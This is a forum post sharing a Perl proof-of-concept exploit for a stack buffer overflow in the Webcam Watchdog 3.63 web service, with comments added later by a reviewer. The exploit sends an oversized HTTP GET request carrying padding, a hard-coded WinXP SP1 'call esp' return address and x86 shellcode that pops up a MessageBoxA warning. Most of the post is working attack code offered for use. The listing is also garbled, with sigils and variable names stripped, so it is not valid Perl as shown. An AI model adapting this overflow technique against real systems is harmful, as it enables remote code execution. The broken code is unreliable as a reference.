I looked and didn't see it posted anywhere;
if you get some use from it, then great.
#! /usr/bin/perl -w
#
# Stack Overflow in Webcam Watchdog - Proof of Concept Exploit
#
# - Tested on version 3.63 - MessageBoxA Shellcode
#
# - By Peter Winter-Smith [ peter4020@hotmail.com ]
# NOTE(review): this listing was damaged in extraction. Sigils and variable
# names are missing (several statements begin with a bare "="), and keywords
# appear capitalised ("Use", "If", "Print"), so it is not valid Perl as shown.
# The comments below describe only what the surviving text establishes.
#
# Defensive summary: the script opens a TCP connection to the Webcam Watchdog
# web service and sends a single crafted HTTP GET request. The header names
# 3.63 as the tested version; no fixed version is stated on this page, so
# keep the service's web port off untrusted networks until the installed
# version is confirmed unaffected.
Use IO::Socket;
# Argument check: prints the usage text and exits. The usage text promises a
# default port of 80, but no fallback is visible where PeerPort is set below.
If (! ([ 1 ]))
{
Print "\nUsage: Wcwdpoc.pl <test_system> <port>\n ".
"\tDefault port is 80\n\n";
Exit;
}
Print "\nWebcam Watchdog 3.63 Stack Overflow PoC\n";
# Opens a TCP connection to the host and port taken from the command line and
# dies with a message if the connection cannot be made.
= IO::Socket::INET->new (Proto=>'tcp',
PeerAddr=>ARGV [ 0 ],
PeerPort=>ARGV [ 1 ])
Or die "Unable to connect to [ 0 ] on port [ 1 ]";
# Payload bytes (the name of the variable they were assigned to is lost).
# The printable tail, from "\x75\x73\x65" onwards, spells "user32", "dll",
# "MessageBoxA", "Warning!" and
# "This_version_of_Webcam_Watchdog_is_vulnerable_to_remote_compromise!",
# separated by \xFE / \xFF marker bytes. That matches the header's description
# of a MessageBoxA demonstration payload.
= "\x90\x90\x90\x90\x90\x90\x90\x90".
"\xEB\x5D\x5F\x55\x89\xE5\x81\xC4".
"\xF0\xFF\xFF\xFF\x57\xFC\xB0\xFE".
"\xF2\xAE\x80\x47\xFF\x30\x5F\x57".
"\x31\xD2\xB9\xFF\xFF\xFF\xFF\xB2".
"\x05\xB0\xFF\xF2\xAE\xFE\x47\xFF".
"\x57\xFE\xCA\x80\xFA\x01\x75\xF3".
"\x81\xEC\xFC\xFF\xFF\xFF\x89\xE3".
"\xFF\x73\x0C\xBE\xFF\xEC\x59\x42".
"\xC1\xEE\x08\xFF\x16\xFF\x73\x08".
"\x50\xBE\xFF\xE4\x59\x42\xC1\xEE".
"\x08\xFF\x16\x31\xC9\x51\xFF\x73".
"\x04\xFF\x33\x51\xFF\xD0\xCC\x90".
"\xE8\x9D\xFF\xFF\xFF\x75\x73\x65".
"\x72\x33\x32\xFE\x64\x6C\x6C\xFF".
"\x4D\x65\x73\x73\x61\x67\x65\x42".
"\x6F\x78\x41\xFF\x57\x61\x72\x6E".
"\x69\x6E\x67\x21\xFF\x54\x68\x69".
"\x73\x5F\x76\x65\x72\x73\x69\x6F".
"\x6E\x5F\x6F\x66\x5F\x57\x65\x62".
"\x63\x61\x6D\x5F\x57\x61\x74\x63".
"\x68\x64\x6F\x67\x5F\x69\x73\x5F".
"\x76\x75\x6C\x6E\x65\x72\x61\x62".
"\x6C\x65\x5F\x74\x6F\x5F\x72\x65".
"\x6D\x6F\x74\x65\x5F\x63\x6F\x6D".
"\x70\x72\x6F\x6D\x69\x73\x65\x21".
"\xFF";
# Four-byte filler string; its variable name is lost.
= "BBBB";
# Hard-coded four-byte address. Per the author's trailing comment it is tied
# to one OS build, so the message box is only expected on that build.
# NOTE(review): on other builds the request would presumably crash the
# service instead -- treat an unexplained crash as an indicator too; confirm.
= "\x59\xAE\xE9\x77"; # WinXP Home SP1 'kernel32.dll' - 'call esp'
# Padding of repeated "a" characters. The expression is truncated
# ("x234..."), so the exact length cannot be read from this listing.
= "a" x234...;
# HTTP request text. Whatever was joined between "GET/" and "HTTP/1.1" has
# been stripped; presumably the padding, address and payload above formed an
# oversized request path -- TODO confirm against an intact copy.
# Detection: the fixed User-Agent "WCSAXRView" and Host "127.0.0.1" values can
# seed a signature but are trivially changed; an abnormally long request line
# reaching the service is the more durable signal.
= "GET/". "HTTP/1.1\r\n".
"User-Agent: WCSAXRView\r\n ".
"Host: 127.0.0.1\r\n ".
"Cache-Control: No-cache\r\n\r\n ";
# The filehandle and request arguments of this print were stripped;
# presumably it wrote the request to the socket opened above.
Print;
Print "+ Testing remote system\n + MessageBox should appear if vulnerable! \n ";
# Waits two seconds, then closes a handle whose name is lost (presumably the
# socket) before reporting completion.
Sleep (2);
Close ();
Print "Done. \n";
Exit;
